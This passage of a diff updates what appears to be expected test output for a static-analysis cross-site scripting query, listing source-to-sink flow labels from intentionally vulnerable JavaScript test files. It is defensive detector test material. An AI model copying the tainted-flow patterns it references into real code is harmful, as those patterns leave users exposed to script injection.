    " | +| tst.js:37:20:37:20 | s | semmle.label | s | +| tst.js:37:20:37:20 | s | semmle.label | s | +| tst.js:39:16:39:45 | wrap(do ... search) | semmle.label | wrap(do ... search) | +| tst.js:39:21:39:44 | documen ... .search | semmle.label | documen ... .search | +| tst.js:41:15:41:15 | s | semmle.label | s | +| tst.js:43:12:43:12 | s | semmle.label | s | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:46:16:46:45 | chop(do ... search) | semmle.label | chop(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | semmle.label | documen ... .search | +| tst.js:47:16:47:45 | chop(do ... search) | semmle.label | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | semmle.label | documen ... .search | +| tst.js:48:16:48:32 | wrap(chop(bar())) | semmle.label | wrap(chop(bar())) | +| tst.js:48:21:48:31 | chop(bar()) | semmle.label | chop(bar()) | +| tst.js:48:21:48:31 | chop(bar()) | semmle.label | chop(bar()) | +| tst.js:48:26:48:30 | bar() | semmle.label | bar() | +| tst.js:50:34:50:34 | s | semmle.label | s | +| tst.js:51:18:51:18 | s | semmle.label | s | +| tst.js:53:25:53:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:54:25:54:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:56:16:56:20 | bar() | semmle.label | bar() | +| tst.js:58:1:58:27 | [,docum ... search] [1] | semmle.label | [,docum ... search] [1] | +| tst.js:58:3:58:26 | documen ... .search | semmle.label | documen ... .search | +| tst.js:58:46:58:46 | x | semmle.label | x | +| tst.js:60:20:60:20 | x | semmle.label | x | +| tst.js:63:49:63:72 | documen ... .search | semmle.label | documen ... .search | +| tst.js:67:26:67:49 | documen ... .search | semmle.label | documen ... .search | +| tst.js:68:25:68:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:70:33:70:56 | documen ... .search | semmle.label | documen ... .search | +| tst.js:71:32:71:55 | documen ... .search | semmle.label | documen ... .search | +| tst.js:76:39:76:62 | documen ... .search | semmle.label | documen ... .search | +| tst.js:82:30:82:53 | documen ... .search | semmle.label | documen ... .search | +| tst.js:88:25:88:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:93:7:93:44 | v | semmle.label | v | +| tst.js:93:11:93:34 | documen ... .search | semmle.label | documen ... .search | +| tst.js:93:11:93:44 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | +| tst.js:95:18:95:18 | v | semmle.label | v | +| tst.js:120:18:120:18 | v | semmle.label | v | +| tst.js:132:29:132:50 | window. ... .search | semmle.label | window. ... .search | +| tst.js:135:29:135:29 | v | semmle.label | v | +| tst.js:135:49:135:49 | v | semmle.label | v | +| tst.js:139:29:139:46 | xssSourceService() | semmle.label | xssSourceService() | +| tst.js:142:40:142:61 | window. ... .search | semmle.label | window. ... .search | +| tst.js:161:9:161:41 | target | semmle.label | target | +| tst.js:161:18:161:41 | documen ... .search | semmle.label | documen ... .search | +| tst.js:164:28:164:33 | target | semmle.label | target | +| tst.js:168:9:168:42 | tainted | semmle.label | tainted | +| tst.js:168:19:168:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:170:31:170:37 | tainted | semmle.label | tainted | +| tst.js:172:42:172:48 | tainted | semmle.label | tainted | +| tst.js:173:33:173:39 | tainted | semmle.label | tainted | +| tst.js:175:54:175:60 | tainted | semmle.label | tainted | +| tst.js:176:45:176:51 | tainted | semmle.label | tainted | +| tst.js:177:49:177:55 | tainted | semmle.label | tainted | +| tst.js:181:9:181:42 | tainted | semmle.label | tainted | +| tst.js:181:19:181:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:183:67:183:73 | tainted | semmle.label | tainted | +| tst.js:184:67:184:73 | tainted | semmle.label | tainted | +| tst.js:188:35:188:41 | tainted | semmle.label | tainted | +| tst.js:190:46:190:52 | tainted | semmle.label | tainted | +| tst.js:191:38:191:44 | tainted | semmle.label | tainted | +| tst.js:192:35:192:41 | tainted | semmle.label | tainted | +| tst.js:196:28:196:46 | this.state.tainted1 | semmle.label | this.state.tainted1 | +| tst.js:197:28:197:46 | this.state.tainted2 | semmle.label | this.state.tainted2 | +| tst.js:198:28:198:46 | this.state.tainted3 | semmle.label | this.state.tainted3 | +| tst.js:202:32:202:49 | prevState.tainted4 | semmle.label | prevState.tainted4 | +| tst.js:209:28:209:46 | this.props.tainted1 | semmle.label | this.props.tainted1 | +| tst.js:210:28:210:46 | this.props.tainted2 | semmle.label | this.props.tainted2 | +| tst.js:211:28:211:46 | this.props.tainted3 | semmle.label | this.props.tainted3 | +| tst.js:215:32:215:49 | prevProps.tainted4 | semmle.label | prevProps.tainted4 | +| tst.js:220:35:220:41 | tainted | semmle.label | tainted | +| tst.js:222:20:222:26 | tainted | semmle.label | tainted | +| tst.js:224:23:224:29 | tainted | semmle.label | tainted | +| tst.js:225:23:225:29 | tainted | semmle.label | tainted | +| tst.js:231:39:231:55 | props.propTainted | semmle.label | props.propTainted | +| tst.js:235:60:235:82 | this.st ... Tainted | semmle.label | this.st ... Tainted | +| tst.js:239:23:239:29 | tainted | semmle.label | tainted | +| tst.js:243:7:243:17 | window.name | semmle.label | window.name | +| tst.js:244:7:244:10 | name | semmle.label | name | +| tst.js:248:11:248:21 | window.name | semmle.label | window.name | +| tst.js:264:22:264:29 | location | semmle.label | location | +| tst.js:269:9:269:29 | tainted | semmle.label | tainted | +| tst.js:269:19:269:29 | window.name | semmle.label | window.name | +| tst.js:272:59:272:65 | tainted | semmle.label | tainted | +| tst.js:285:9:285:16 | location | semmle.label | location | +| tst.js:286:10:286:10 | e | semmle.label | e | +| tst.js:287:20:287:20 | e | semmle.label | e | +| tst.js:292:10:292:17 | location | semmle.label | location | +| tst.js:294:10:294:10 | e | semmle.label | e | +| tst.js:295:20:295:20 | e | semmle.label | e | +| tst.js:300:35:300:42 | location | semmle.label | location | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | +| tst.js:311:18:311:34 | document.location | semmle.label | document.location | +| tst.js:315:7:315:43 | params | semmle.label | params | +| tst.js:315:7:315:43 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | semmle.label | getTaintedUrl() [searchParams, MapValue] | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | semmle.label | getTaintedUrl() [searchParams] | +| tst.js:315:16:315:43 | getTain ... hParams | semmle.label | getTain ... hParams | +| tst.js:315:16:315:43 | getTain ... hParams [MapValue] | semmle.label | getTain ... hParams [MapValue] | +| tst.js:316:18:316:23 | params | semmle.label | params | +| tst.js:316:18:316:23 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:316:18:316:35 | params.get('name') | semmle.label | params.get('name') | +| tst.js:325:12:325:37 | new URL ... cation) [hash] | semmle.label | new URL ... cation) [hash] | +| tst.js:325:20:325:36 | document.location | semmle.label | document.location | +| tst.js:327:5:327:12 | getUrl() [hash] | semmle.label | getUrl() [hash] | +| tst.js:327:5:327:17 | getUrl().hash | semmle.label | getUrl().hash | +| tst.js:327:5:327:30 | getUrl( ... ring(1) | semmle.label | getUrl( ... ring(1) | +| tst.js:332:7:332:39 | target | semmle.label | target | +| tst.js:332:16:332:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:333:12:333:17 | target | semmle.label | target | +| tst.js:339:10:339:42 | target | semmle.label | target | +| tst.js:339:19:339:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:340:16:340:21 | target | semmle.label | target | +| tst.js:341:20:341:25 | target | semmle.label | target | +| tst.js:344:21:344:26 | target | semmle.label | target | +| tst.js:347:18:347:23 | target | semmle.label | target | +| tst.js:355:7:355:39 | target | semmle.label | target | +| tst.js:355:16:355:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:357:18:357:23 | target | semmle.label | target | +| tst.js:364:7:364:39 | target | semmle.label | target | +| tst.js:364:16:364:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:367:18:367:23 | target | semmle.label | target | +| tst.js:369:18:369:23 | target | semmle.label | target | +| tst.js:369:18:369:29 | target.taint | semmle.label | target.taint | +| tst.js:374:3:374:8 | [post update] target [taint3] | semmle.label | [post update] target [taint3] | +| tst.js:374:19:374:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:375:18:375:23 | target [taint3] | semmle.label | target [taint3] | +| tst.js:375:18:375:30 | target.taint3 | semmle.label | target.taint3 | +| tst.js:380:18:380:23 | target | semmle.label | target | +| tst.js:380:18:380:30 | target.taint5 | semmle.label | target.taint5 | +| tst.js:389:18:389:23 | target | semmle.label | target | +| tst.js:389:18:389:30 | target.taint7 | semmle.label | target.taint7 | +| tst.js:391:3:391:8 | [post update] target [taint8] | semmle.label | [post update] target [taint8] | +| tst.js:391:19:391:24 | target | semmle.label | target | +| tst.js:391:19:391:24 | target [taint8] | semmle.label | target [taint8] | +| tst.js:391:19:391:31 | target.taint8 | semmle.label | target.taint8 | +| tst.js:392:18:392:23 | target [taint8] | semmle.label | target [taint8] | +| tst.js:392:18:392:30 | target.taint8 | semmle.label | target.taint8 | +| tst.js:399:7:399:46 | payload | semmle.label | payload | +| tst.js:399:17:399:36 | window.location.hash | semmle.label | window.location.hash | +| tst.js:399:17:399:46 | window. ... bstr(1) | semmle.label | window. ... bstr(1) | +| tst.js:400:18:400:24 | payload | semmle.label | payload | +| tst.js:402:7:402:55 | match | semmle.label | match | +| tst.js:402:15:402:34 | window.location.hash | semmle.label | window.location.hash | +| tst.js:402:15:402:55 | window. ... (\\w+)/) | semmle.label | window. ... (\\w+)/) | +| tst.js:404:20:404:24 | match | semmle.label | match | +| tst.js:404:20:404:27 | match[1] | semmle.label | match[1] | +| tst.js:407:18:407:37 | window.location.hash | semmle.label | window.location.hash | +| tst.js:407:18:407:48 | window. ... it('#') [1] | semmle.label | window. ... it('#') [1] | +| tst.js:407:18:407:51 | window. ... '#')[1] | semmle.label | window. ... '#')[1] | +| tst.js:411:7:411:39 | target | semmle.label | target | +| tst.js:411:16:411:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:413:18:413:23 | target | semmle.label | target | +| tst.js:413:18:413:89 | target. ... data>') | semmle.label | target. ... data>') | +| tst.js:419:6:419:38 | source | semmle.label | source | +| tst.js:419:15:419:38 | documen ... .search | semmle.label | documen ... .search | +| tst.js:423:28:423:33 | source | semmle.label | source | +| tst.js:424:33:424:38 | source | semmle.label | source | +| tst.js:425:34:425:39 | source | semmle.label | source | +| tst.js:426:41:426:46 | source | semmle.label | source | +| tst.js:427:44:427:49 | source | semmle.label | source | +| tst.js:428:32:428:37 | source | semmle.label | source | +| tst.js:436:7:436:39 | source | semmle.label | source | +| tst.js:436:16:436:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:438:18:438:23 | source | semmle.label | source | +| tst.js:439:18:439:42 | ansiToH ... source) | semmle.label | ansiToH ... source) | +| tst.js:439:36:439:41 | source | semmle.label | source | +| tst.js:443:6:443:38 | source | semmle.label | source | +| tst.js:443:15:443:38 | documen ... .search | semmle.label | documen ... .search | +| tst.js:446:21:446:26 | source | semmle.label | source | +| tst.js:448:19:448:24 | source | semmle.label | source | +| tst.js:450:20:450:25 | source | semmle.label | source | +| tst.js:454:7:454:46 | url | semmle.label | url | +| tst.js:454:13:454:36 | documen ... .search | semmle.label | documen ... .search | +| tst.js:454:13:454:46 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | +| tst.js:456:19:456:21 | url | semmle.label | url | +| tst.js:457:26:457:28 | url | semmle.label | url | +| tst.js:458:25:458:27 | url | semmle.label | url | +| tst.js:459:20:459:22 | url | semmle.label | url | +| tst.js:469:22:469:24 | url | semmle.label | url | +| tst.js:474:23:474:35 | location.hash | semmle.label | location.hash | +| tst.js:474:23:474:45 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | +| tst.js:477:18:477:30 | location.hash | semmle.label | location.hash | +| tst.js:477:18:477:40 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | +| tst.js:484:33:484:63 | decodeU ... n.hash) | semmle.label | decodeU ... n.hash) | +| tst.js:484:43:484:62 | window.location.hash | semmle.label | window.location.hash | +| tst.js:491:7:491:39 | target | semmle.label | target | +| tst.js:491:16:491:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:492:18:492:23 | target | semmle.label | target | +| tst.js:492:18:492:54 | target. ... "), '') | semmle.label | target. ... "), '') | +| typeahead.js:20:13:20:45 | target | semmle.label | target | +| typeahead.js:20:22:20:45 | documen ... .search | semmle.label | documen ... .search | +| typeahead.js:21:12:21:17 | target | semmle.label | target | +| typeahead.js:24:30:24:32 | val | semmle.label | val | +| typeahead.js:25:18:25:20 | val | semmle.label | val | +| various-concat-obfuscations.js:2:6:2:39 | tainted | semmle.label | tainted | +| various-concat-obfuscations.js:2:16:2:39 | documen ... .search | semmle.label | documen ... .search | +| various-concat-obfuscations.js:4:4:4:31 | "
    " ...
    " | semmle.label | "
    " ...
    " | +| various-concat-obfuscations.js:4:14:4:20 | tainted | semmle.label | tainted | +| various-concat-obfuscations.js:5:4:5:26 | `
    $ ...
    ` | semmle.label | `
    $ ...
    ` | +| various-concat-obfuscations.js:5:12:5:18 | tainted | semmle.label | tainted | +| various-concat-obfuscations.js:6:4:6:26 | "
    " ... ainted) | semmle.label | "
    " ... ainted) | +| various-concat-obfuscations.js:6:4:6:43 | "
    " ... /div>") | semmle.label | "
    " ... /div>") | +| various-concat-obfuscations.js:6:19:6:25 | tainted | semmle.label | tainted | +| various-concat-obfuscations.js:7:4:7:31 | ["
    ... /div>"] | semmle.label | ["
    ... /div>"] | +| various-concat-obfuscations.js:7:4:7:38 | ["
    ... .join() | semmle.label | ["
    ... .join() | +| various-concat-obfuscations.js:7:14:7:20 | tainted | semmle.label | tainted | +| various-concat-obfuscations.js:9:4:9:34 | "
    " | semmle.label | "
    " | +| various-concat-obfuscations.js:9:19:9:25 | tainted | semmle.label | tainted | +| various-concat-obfuscations.js:10:4:10:27 | `
    ` | semmle.label | `
    ` | +| various-concat-obfuscations.js:10:16:10:22 | tainted | semmle.label | tainted | +| various-concat-obfuscations.js:11:4:11:31 | "
    ") | semmle.label | "
    ") | +| various-concat-obfuscations.js:11:24:11:30 | tainted | semmle.label | tainted | +| various-concat-obfuscations.js:12:4:12:34 | ["
    "] | semmle.label | ["
    "] | +| various-concat-obfuscations.js:12:4:12:41 | ["
    ' | semmle.label | '
    ' | +| various-concat-obfuscations.js:15:27:15:55 | (attrs. ... 'left') | semmle.label | (attrs. ... 'left') | +| various-concat-obfuscations.js:15:28:15:32 | attrs | semmle.label | attrs | +| various-concat-obfuscations.js:17:24:17:28 | attrs | semmle.label | attrs | +| various-concat-obfuscations.js:18:10:18:59 | '
    ') | semmle.label | '
    ') | +| various-concat-obfuscations.js:18:10:18:105 | '
    ') [ArrayElement] | semmle.label | '
    ') [ArrayElement] | +| various-concat-obfuscations.js:18:32:18:36 | attrs | semmle.label | attrs | +| various-concat-obfuscations.js:18:32:18:58 | attrs.d ... 'left' | semmle.label | attrs.d ... 'left' | +| various-concat-obfuscations.js:20:4:20:47 | indirec ... .attrs) | semmle.label | indirec ... .attrs) | +| various-concat-obfuscations.js:20:17:20:40 | documen ... .search | semmle.label | documen ... .search | +| various-concat-obfuscations.js:20:17:20:46 | documen ... h.attrs | semmle.label | documen ... h.attrs | +| various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | semmle.label | indirec ... .attrs) | +| various-concat-obfuscations.js:21:17:21:40 | documen ... .search | semmle.label | documen ... .search | +| various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | semmle.label | documen ... h.attrs | +| winjs.js:2:7:2:53 | tainted | semmle.label | tainted | +| winjs.js:2:17:2:40 | documen ... .search | semmle.label | documen ... .search | +| winjs.js:2:17:2:53 | documen ... ring(1) | semmle.label | documen ... ring(1) | +| winjs.js:3:43:3:49 | tainted | semmle.label | tainted | +| winjs.js:4:43:4:49 | tainted | semmle.label | tainted | subpaths | optionalSanitizer.js:34:28:34:35 | tainted2 | optionalSanitizer.js:28:24:28:24 | x | optionalSanitizer.js:29:12:29:12 | x | optionalSanitizer.js:34:16:34:36 | sanitiz ... inted2) | | optionalSanitizer.js:41:28:41:35 | tainted3 | optionalSanitizer.js:28:24:28:24 | x | optionalSanitizer.js:29:12:29:12 | x | optionalSanitizer.js:41:16:41:36 | sanitiz ... inted3) | | optionalSanitizer.js:45:41:45:46 | target | optionalSanitizer.js:28:24:28:24 | x | optionalSanitizer.js:29:12:29:12 | x | optionalSanitizer.js:45:29:45:47 | sanitizeBad(target) | | tooltip.jsx:18:51:18:57 | provide [source] | tooltip.jsx:23:38:23:43 | source | tooltip.jsx:23:38:23:43 | source | tooltip.jsx:18:51:18:59 | provide() | -| tst.js:40:20:40:43 | documen ... .search | tst.js:36:14:36:14 | x | tst.js:37:10:37:10 | x | tst.js:40:16:40:44 | baz(doc ... search) | -| tst.js:46:21:46:44 | documen ... .search | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
    " ...
    " | tst.js:46:16:46:45 | wrap(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
    " ...
    " | tst.js:58:16:58:32 | wrap(chop(bar())) | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
    " ...
    " | tst.js:58:16:58:32 | wrap(chop(bar())) | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:58:21:58:31 | chop(bar()) | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:58:21:58:31 | chop(bar()) | +| tst.js:34:20:34:43 | documen ... .search | tst.js:31:14:31:14 | x | tst.js:32:10:32:10 | x | tst.js:34:16:34:44 | baz(doc ... search) | +| tst.js:39:21:39:44 | documen ... .search | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
    " ...
    " | tst.js:39:16:39:45 | wrap(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
    " ...
    " | tst.js:48:16:48:32 | wrap(chop(bar())) | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
    " ...
    " | tst.js:48:16:48:32 | wrap(chop(bar())) | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:48:21:48:31 | chop(bar()) | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:48:21:48:31 | chop(bar()) | | various-concat-obfuscations.js:20:17:20:46 | documen ... h.attrs | various-concat-obfuscations.js:14:24:14:28 | attrs | various-concat-obfuscations.js:15:10:15:83 | '
    ' | various-concat-obfuscations.js:20:4:20:47 | indirec ... .attrs) | | various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | various-concat-obfuscations.js:17:24:17:28 | attrs | various-concat-obfuscations.js:18:10:18:105 | '
    ') | various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | | various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | various-concat-obfuscations.js:17:24:17:28 | attrs | various-concat-obfuscations.js:18:10:18:105 | '
    ') [ArrayElement] | various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | -#select -| addEventListener.js:2:20:2:29 | event.data | addEventListener.js:1:43:1:47 | event | addEventListener.js:2:20:2:29 | event.data | Cross-site scripting vulnerability due to $@. | addEventListener.js:1:43:1:47 | event | user-provided value | -| addEventListener.js:6:20:6:23 | data | addEventListener.js:5:43:5:48 | {data} | addEventListener.js:6:20:6:23 | data | Cross-site scripting vulnerability due to $@. | addEventListener.js:5:43:5:48 | {data} | user-provided value | -| addEventListener.js:12:24:12:33 | event.data | addEventListener.js:10:21:10:25 | event | addEventListener.js:12:24:12:33 | event.data | Cross-site scripting vulnerability due to $@. | addEventListener.js:10:21:10:25 | event | user-provided value | -| angular2-client.ts:24:44:24:71 | \\u0275getDOM ... ().href | angular2-client.ts:24:44:24:71 | \\u0275getDOM ... ().href | angular2-client.ts:24:44:24:71 | \\u0275getDOM ... ().href | Cross-site scripting vulnerability due to $@. | angular2-client.ts:24:44:24:71 | \\u0275getDOM ... ().href | user-provided value | -| angular2-client.ts:26:44:26:73 | this.ro ... ams.foo | angular2-client.ts:26:44:26:69 | this.ro ... .params | angular2-client.ts:26:44:26:73 | this.ro ... ams.foo | Cross-site scripting vulnerability due to $@. | angular2-client.ts:26:44:26:69 | this.ro ... .params | user-provided value | -| angular2-client.ts:27:44:27:78 | this.ro ... ams.foo | angular2-client.ts:27:44:27:74 | this.ro ... yParams | angular2-client.ts:27:44:27:78 | this.ro ... ams.foo | Cross-site scripting vulnerability due to $@. | angular2-client.ts:27:44:27:74 | this.ro ... yParams | user-provided value | -| angular2-client.ts:28:44:28:71 | this.ro ... ragment | angular2-client.ts:28:44:28:71 | this.ro ... ragment | angular2-client.ts:28:44:28:71 | this.ro ... ragment | Cross-site scripting vulnerability due to $@. | angular2-client.ts:28:44:28:71 | this.ro ... ragment | user-provided value | -| angular2-client.ts:29:44:29:82 | this.ro ... ('foo') | angular2-client.ts:29:44:29:82 | this.ro ... ('foo') | angular2-client.ts:29:44:29:82 | this.ro ... ('foo') | Cross-site scripting vulnerability due to $@. | angular2-client.ts:29:44:29:82 | this.ro ... ('foo') | user-provided value | -| angular2-client.ts:30:44:30:87 | this.ro ... ('foo') | angular2-client.ts:30:44:30:87 | this.ro ... ('foo') | angular2-client.ts:30:44:30:87 | this.ro ... ('foo') | Cross-site scripting vulnerability due to $@. | angular2-client.ts:30:44:30:87 | this.ro ... ('foo') | user-provided value | -| angular2-client.ts:32:46:32:59 | map.get('foo') | angular2-client.ts:32:46:32:59 | map.get('foo') | angular2-client.ts:32:46:32:59 | map.get('foo') | Cross-site scripting vulnerability due to $@. | angular2-client.ts:32:46:32:59 | map.get('foo') | user-provided value | -| angular2-client.ts:35:44:35:74 | this.ro ... 1].path | angular2-client.ts:35:44:35:74 | this.ro ... 1].path | angular2-client.ts:35:44:35:74 | this.ro ... 1].path | Cross-site scripting vulnerability due to $@. | angular2-client.ts:35:44:35:74 | this.ro ... 1].path | user-provided value | -| angular2-client.ts:36:44:36:82 | this.ro ... eters.x | angular2-client.ts:36:44:36:80 | this.ro ... ameters | angular2-client.ts:36:44:36:82 | this.ro ... eters.x | Cross-site scripting vulnerability due to $@. | angular2-client.ts:36:44:36:80 | this.ro ... ameters | user-provided value | -| angular2-client.ts:37:44:37:91 | this.ro ... et('x') | angular2-client.ts:37:44:37:91 | this.ro ... et('x') | angular2-client.ts:37:44:37:91 | this.ro ... et('x') | Cross-site scripting vulnerability due to $@. | angular2-client.ts:37:44:37:91 | this.ro ... et('x') | user-provided value | -| angular2-client.ts:38:44:38:91 | this.ro ... arams.x | angular2-client.ts:38:44:38:89 | this.ro ... .params | angular2-client.ts:38:44:38:91 | this.ro ... arams.x | Cross-site scripting vulnerability due to $@. | angular2-client.ts:38:44:38:89 | this.ro ... .params | user-provided value | -| angular2-client.ts:40:44:40:58 | this.router.url | angular2-client.ts:40:44:40:58 | this.router.url | angular2-client.ts:40:44:40:58 | this.router.url | Cross-site scripting vulnerability due to $@. | angular2-client.ts:40:44:40:58 | this.router.url | user-provided value | -| angular2-client.ts:42:45:42:59 | this.router.url | angular2-client.ts:42:45:42:59 | this.router.url | angular2-client.ts:42:45:42:59 | this.router.url | Cross-site scripting vulnerability due to $@. | angular2-client.ts:42:45:42:59 | this.router.url | user-provided value | -| angular2-client.ts:43:75:43:109 | this.ro ... ams.foo | angular2-client.ts:43:75:43:105 | this.ro ... yParams | angular2-client.ts:43:75:43:109 | this.ro ... ams.foo | Cross-site scripting vulnerability due to $@. | angular2-client.ts:43:75:43:105 | this.ro ... yParams | user-provided value | -| angular2-client.ts:47:44:47:76 | routeSn ... ('foo') | angular2-client.ts:47:44:47:76 | routeSn ... ('foo') | angular2-client.ts:47:44:47:76 | routeSn ... ('foo') | Cross-site scripting vulnerability due to $@. | angular2-client.ts:47:44:47:76 | routeSn ... ('foo') | user-provided value | -| angular-tempate-url.js:9:26:9:45 | Cookie.get("unsafe") | angular-tempate-url.js:13:30:13:31 | ev | angular-tempate-url.js:9:26:9:45 | Cookie.get("unsafe") | Cross-site scripting vulnerability due to $@. | angular-tempate-url.js:13:30:13:31 | ev | user-provided value | -| classnames.js:7:31:7:84 | `` | classnames.js:7:58:7:68 | window.name | classnames.js:7:31:7:84 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:7:58:7:68 | window.name | user-provided value | -| classnames.js:8:31:8:85 | `` | classnames.js:8:59:8:69 | window.name | classnames.js:8:31:8:85 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:8:59:8:69 | window.name | user-provided value | -| classnames.js:9:31:9:85 | `` | classnames.js:9:59:9:69 | window.name | classnames.js:9:31:9:85 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:9:59:9:69 | window.name | user-provided value | -| classnames.js:11:31:11:79 | `` | classnames.js:10:45:10:55 | window.name | classnames.js:11:31:11:79 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:10:45:10:55 | window.name | user-provided value | -| classnames.js:13:31:13:83 | `` | classnames.js:13:57:13:67 | window.name | classnames.js:13:31:13:83 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:13:57:13:67 | window.name | user-provided value | -| classnames.js:15:31:15:78 | `` | classnames.js:15:52:15:62 | window.name | classnames.js:15:31:15:78 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:15:52:15:62 | window.name | user-provided value | -| classnames.js:17:32:17:79 | `` | classnames.js:17:53:17:63 | window.name | classnames.js:17:32:17:79 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:17:53:17:63 | window.name | user-provided value | -| clipboard.ts:15:25:15:28 | html | clipboard.ts:8:18:8:51 | clipboa ... /html') | clipboard.ts:15:25:15:28 | html | Cross-site scripting vulnerability due to $@. | clipboard.ts:8:18:8:51 | clipboa ... /html') | user-provided value | -| clipboard.ts:24:23:24:58 | e.clipb ... /html') | clipboard.ts:24:23:24:58 | e.clipb ... /html') | clipboard.ts:24:23:24:58 | e.clipb ... /html') | Cross-site scripting vulnerability due to $@. | clipboard.ts:24:23:24:58 | e.clipb ... /html') | user-provided value | -| clipboard.ts:29:19:29:54 | e.clipb ... /html') | clipboard.ts:29:19:29:54 | e.clipb ... /html') | clipboard.ts:29:19:29:54 | e.clipb ... /html') | Cross-site scripting vulnerability due to $@. | clipboard.ts:29:19:29:54 | e.clipb ... /html') | user-provided value | -| clipboard.ts:33:19:33:68 | e.origi ... /html') | clipboard.ts:33:19:33:68 | e.origi ... /html') | clipboard.ts:33:19:33:68 | e.origi ... /html') | Cross-site scripting vulnerability due to $@. | clipboard.ts:33:19:33:68 | e.origi ... /html') | user-provided value | -| clipboard.ts:50:29:50:32 | html | clipboard.ts:43:22:43:55 | clipboa ... /html') | clipboard.ts:50:29:50:32 | html | Cross-site scripting vulnerability due to $@. | clipboard.ts:43:22:43:55 | clipboa ... /html') | user-provided value | -| clipboard.ts:73:29:73:39 | droppedHtml | clipboard.ts:71:27:71:62 | e.clipb ... /html') | clipboard.ts:73:29:73:39 | 